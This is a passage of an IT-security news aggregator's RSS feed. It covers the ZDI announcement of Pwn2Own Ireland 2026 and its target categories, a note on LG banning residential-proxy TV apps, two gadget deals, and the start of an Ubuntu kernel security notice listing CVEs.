<guid isPermaLink="true">https://tsecurity.de/de/3685085/it-security-nachrichten/lg-to-ban-residential-proxies-from-smart-tv-apps/</guid>
<pubDate>Wed, 22 Jul 2026 03:25:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The home appliance giant LG Electronics USA said this week it plans to suspend any apps built for its smart TVs that turn one's television into an always-on residential proxy node. The move comes less than a month after researchers found that more than 42 percent of games and other apps available for download on LG's webOS store allow unknown third-parties to route their Internet traffic through a user's TV.]]></content:encoded>
</item>
<item>
<title><![CDATA[Pwn2Own Ireland 2026 – New Targets and Categories]]></title>
<description><![CDATA[If you just want to read the rules, you can find them here.  Pwn2Own Ireland returns for 2026, and it’s the third year for this event in the Emerald Isle. Despite the dreary Irish skies (and the threat of a random banshee), we had an amazing event, even if we did end up in a jail at the end. With...]]></description>
<link>https://tsecurity.de/de/3684491/it-security-nachrichten/pwn2own-ireland-2026-new-targets-and-categories/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684491/it-security-nachrichten/pwn2own-ireland-2026-new-targets-and-categories/</guid>
<pubDate>Tue, 21 Jul 2026 19:45:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class=""><em>If you just want to read the rules, you can find them </em><a href="https://www.zerodayinitiative.com/Pwn2OwnIreland2026Rules.html" target="_blank"><em>here</em></a><em>. </em></p><p class=""> </p><p class="">Pwn2Own Ireland returns for 2026, and it’s the third year for this event in the Emerald Isle. Despite the dreary Irish skies (and the threat of a random <a href="https://youtube.com/shorts/PjpvUdhn6e0?feature=share">banshee</a>), we had an amazing event, even if we did end up in a <a href="https://youtu.be/ruxOpC-b-yM?si=Epu-ewvSe5VNQNbP&amp;t=333">jail</a> at the end. With that in mind, we’re excited to return to Cork this fall for yet another great Pwn2Own event. We’ll also be returning to some of the great pubs Ireland has to offer in the evenings and wrapping the event up at a special location (stay tuned for that announcement).</p><p class="">As for the contest itself, it will run from October 6-9, 2026. As always, we’ll have a random drawing to determine the schedule of attempts on the first day of the contest, and we will proceed from there. Registration closes at 5:00 p.m. Irish Standard Time on Oct 1st, 2026. There are no exceptions for late entries, so if you have questions, please contact us at <a href="mailto:pwn2own@trendmicro.com">pwn2own@trendmicro.com</a> (note the address). We will be happy to address your issues or concerns directly.</p><p class="">Due to the overwhelming amount of registrations and last-minute entries for our Pwn2Own Berlin event, we’re changing who can enter the contest a bit to ensure it’s fair for all researchers. To enter, you must have received an aggregate bounty payment totaling at least $15,000 during their life-time participation in ZDI. This includes past Pwn2Own events and our regular bug bounty program. We recognize there may be some who haven’t participated in the past with great exploits to demonstrate, so we will also accept up to 10 new contestants at our discretion. We’re capping the number of entries to 80 this year. Once we have 80 qualifying entries, we will close registration. That means if you want to enter, it is in your best interest to contact us sooner rather than later. Please read the rules <em>thoroughly</em> to ensure you meet all the requirements.</p><p class="">Now on to this year’s target categories. We’ll have seven different categories for this year’s event:</p>





















  
  



<p><a data-preserve-html-node="true" name="top"></a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#phones">-- Mobile Phones</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#smarthome">--	Smart Home Devices</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#wellness">-- Wellness</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#printers">-- Printers</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#messaging">--	Messaging</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#infrastructure">-- AI Infrastructure</a><br><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#agents">-- AI Coding Agents</a>  </p>




  <p class="">Let’s take a look at each category in more detail, starting with mobile phones.</p>





















  
  



<p><a data-preserve-html-node="true" name="phones"></a> </p>




  <p class=""><strong>The Target Phones</strong></p><p class="">Back in Amsterdam where this contest originated, it was originally dubbed “Mobile Pwn2Own” and our focus was strictly on phones. Mobile handsets remain at the heart of this event, and some of the Samsung entries from last year were absolutely smashing. As always, these phones will be running the latest version of their respective operating systems with all available updates installed. Last year we also introduced the USB attack vector, but no one submitted an entry for it. We’ll see if that changes this year.</p><p class="">Otherwise, contestants must compromise the device by browsing to content in the default browser for the target under test or by communicating with the following short-distance protocols: near field communication (NFC), Wi-Fi, or Bluetooth. The awards for this category are:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ad3a0f11-b441-438f-b5f5-7cf758e0fa28/Phones.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="smarthome"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">Smart Home Devices</b></p>




  <p class="">As you might have noticed, we have eliminated most of the consumer-related devices from this year’s event. However, there are still a few “pro-sumer” devices that still could have an impact on enterprises, and the first of these categories are the devices that control other devices and services. An attempt in this category must be launched against the target’s exposed network services, RF attack surface, or exposed features from the contestant’s laptop within the contest network.</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a59fbdac-7b9b-41d6-8af9-ff76fb5c167e/SmartHome.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="wellness"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">Wellness Category</b></p>




  <p class="">This is one of the new categories this year and our first foray into the world of healthcare devices. However, we don’t intend to make this too easy. Entries that require physically pressing any button on the target, or the use of any information, code or PIN printed on the device, are out of scope. Entries that require the contestant to be paired to the target prior to the start of the attempt are not in scope. An attempt in this category must be launched against the target’s exposed network services, RF attack surface, or exposed features from the contestant’s laptop within the contest network.</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/e9489310-7273-4a4d-8001-4086acf0a1f4/Wellness.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="printers"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">Rage Against the Printers </b></p>




  <p class="">Printers have long been the source of jokes and memes, but they are also an often overlooked attack surface in your office. The printer category always produces some interesting results, often by playing music it shouldn’t or the occasional Rick Roll. We’ve reduced the number of targets in this category this year, but we still expect to see some interesting exploits in these oft unheralded targets. </p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/36a174ff-094f-4501-b25d-d911b2308a61/Printers.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="messaging"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">The Messaging Category</b></p>




  <p class="">We introduced WhatsApp as a target last year and came close to seeing a functioning exploit. Sadly, that didn’t happen. However, WhatsApp is used by more than three billion people globally, and some of the messages transmitted can be quite sensitive. That’s why we are bringing it back and hoping for some better results. We know the bugs are out there. We’re just hoping the right researcher decides to show us an exploit that leads to code execution. All of the target handset will be available as clients. Here’s the full prize list for Messaging category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/99bef9c6-0707-41de-a899-5965c2b856d9/Message.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="infrastructure"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">AI Infrastructure Category</b></p>




  <p class="">We introduced these targets at Pwn2Own Berlin, and we saw such…uh…enthusiasm from the community that we decided to immediately bring them back for our Ireland event. An attempt in this category must be launched from the contestant’s laptop. Here’s a look at the targets and awards in the AI Infrastructure category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ecfb8f22-24a5-4c47-8a08-0471c5de356c/AI_Infrastucture.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="agents"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">AI Coding Agent Category</b></p>




  <p class="">Let’s face it. At some point or another, we’ve probably all vibe coded something. There’s no shame in that, but how secure are the tools we use for vibe coding? Well, let’s take the most popular choices and find out. A successful entry must interact with a contestant-controlled resource (e.g. web page, repository, media file) to exploit a vulnerability within the coding agent. The attack vector of the entry must be a common coding agent use case. There are few things out of scope here as well. UI spoofing or misrepresentation unrelated to permission prompts, model jailbreaks or prompt outputs that do not cross security boundaries, and vulnerabilities that require unsafe or permission-less modes are just a few of the things not allowed. As this is a recently updated category, please read the rules carefully to ensure your entry qualifies. Here’s a look at the targets and awards in the AI Coding Agent category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2192242e-3b06-474e-b18b-308e8a47079a/Coding_Agents.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/7/21/pwn2own-ireland-2026-new-targets-and-categories#top"><i data-preserve-html-node="true">Back to top</i></a></p>




  <p class=""><strong>Master of Pwn</strong></p><p class="">No Pwn2Own contest would be complete without crowning a Master of Pwn, which signifies the overall winner of the competition. Earning the title results in a slick <a href="https://pbs.twimg.com/media/Eyexso3WUAYbXPK?format=jpg&amp;name=4096x4096">trophy</a>, a different sort of <a href="https://twitter.com/thezdi/status/1240400682034909187">wearable</a>, and brings with it an additional 65,000 ZDI reward points (instant <a href="https://www.zerodayinitiative.com/about/benefits/">Platinum</a> status in 2027).</p><p class="">For those not familiar with how it works, points are accumulated for each successful attempt. While only the first demonstration in a category wins the full cash award, each successful entry claims the full number of Master of Pwn points. Since the order of attempts is determined by a random draw, those who receive later slots can still claim the Master of Pwn title – even if they earn a lower cash payout. As with previous contests, there are penalties for withdrawing from an attempt once you register for it. If the contestant decides to remove an Add-on Bonus during their attempt, the Master of Pwn points for that Add-on Bonus will be deducted from the final point total for that attempt. For example, someone registers for the Apple iPhone 15 with the Kernel Bonus Add-on. During the attempt, the contestant drops the Kernel Bonus Add-on but completes the attempt. The final point total will be 20 Master of Pwn points.</p><p class=""><strong>The Complete Details</strong></p><p class="">The full set of rules for Pwn2Own Ireland 2026 can be found <a href="https://www.zerodayinitiative.com/Pwn2OwnIreland2026Rules.html" target="_blank">here</a>. They may be changed at any time without notice. We <strong>highly encourage</strong> potential entrants to read the rules <em>thoroughly</em> and <em>completely</em> should they choose to participate. We also encourage contestants to read <a href="https://www.zerodayinitiative.com/blog/2022/5/3/what-to-expect-when-exploiting-a-guide-to-pwn2own-participation" target="_blank">this blog</a> covering what to expect when participating in Pwn2Own.</p><p class="">Registration is required to ensure we have sufficient resources on hand at the event. Please contact ZDI at <a href="mailto:pwn2own@trendmicro.com?subject=Pwn2Own%20Tokyo%202023%20Registration">pwn2own@trendmicro.com</a> to begin the registration process. (Email only, please; queries via social media, blog post, or other means will not be acknowledged or answered.) If we receive more than one registration for any category, we’ll hold a random drawing to determine the contest order. Registration closes at 5:00 p.m. Irish Standard Time on Oct 1st, 2025.</p><p class=""><strong>The Results</strong></p><p class="">We’ll be <a href="https://www.zerodayinitiative.com/blog" target="_blank">blogging</a> and tweeting results in real-time throughout the competition. Be sure to keep an eye on the blog for the latest information. Follow us on Twitter at <a href="https://twitter.com/thezdi" target="_blank">@thezdi</a> and <a href="https://twitter.com/trendaisecurity" target="_blank">@trendaisecurity</a>, and keep an eye on the <a href="https://twitter.com/search?q=%23p2oireland">#P2OIreland</a> hashtag for continuing coverage. </p><p class="">We look forward to seeing everyone in Cork, and we look forward to seeing what new exploits and attack techniques they bring with them.</p><p class=""> </p><p class="">©2026 Trend Micro Incorporated. All rights reserved. PWN2OWN, ZERO DAY INITIATIVE, ZDI, TrendAI, and Trend Micro are trademarks or registered trademarks of Trend Micro Incorporated. All other trademarks and trade names are the property of their respective owners.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ill-fated Companion Cube case for Steam Machine returns as a 3D-printed effort — and it's not the only striking DIY project around Valve's gaming PC]]></title>
<description><![CDATA[Got a 3D printer? You can make your own alternative Companion Cube case for the Steam Machine.]]></description>
<link>https://tsecurity.de/de/3683686/it-nachrichten/ill-fated-companion-cube-case-for-steam-machine-returns-as-a-3d-printed-effort-and-its-not-the-only-striking-diy-project-around-valves-gaming-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683686/it-nachrichten/ill-fated-companion-cube-case-for-steam-machine-returns-as-a-3d-printed-effort-and-its-not-the-only-striking-diy-project-around-valves-gaming-pc/</guid>
<pubDate>Tue, 21 Jul 2026 14:33:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Got a 3D printer? You can make your own alternative Companion Cube case for the Steam Machine.]]></content:encoded>
</item>
<item>
<title><![CDATA[HP’s Smart Tank 5101 drops to $170 for back-to-school — and includes 2 years of ink free in the box]]></title>
<description><![CDATA[HP's ink tank printer is the ideal pick for homes, dorms, and home offices.]]></description>
<link>https://tsecurity.de/de/3683685/it-nachrichten/hps-smart-tank-5101-drops-to-170-for-back-to-school-and-includes-2-years-of-ink-free-in-the-box/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683685/it-nachrichten/hps-smart-tank-5101-drops-to-170-for-back-to-school-and-includes-2-years-of-ink-free-in-the-box/</guid>
<pubDate>Tue, 21 Jul 2026 14:33:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[HP's ink tank printer is the ideal pick for homes, dorms, and home offices.]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8574-1: Linux kernel (GCP FIPS) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3683349/unix-server/usn-8574-1-linux-kernel-gcp-fips-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683349/unix-server/usn-8574-1-linux-kernel-gcp-fips-vulnerabilities/</guid>
<pubDate>Tue, 21 Jul 2026 12:16:02 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
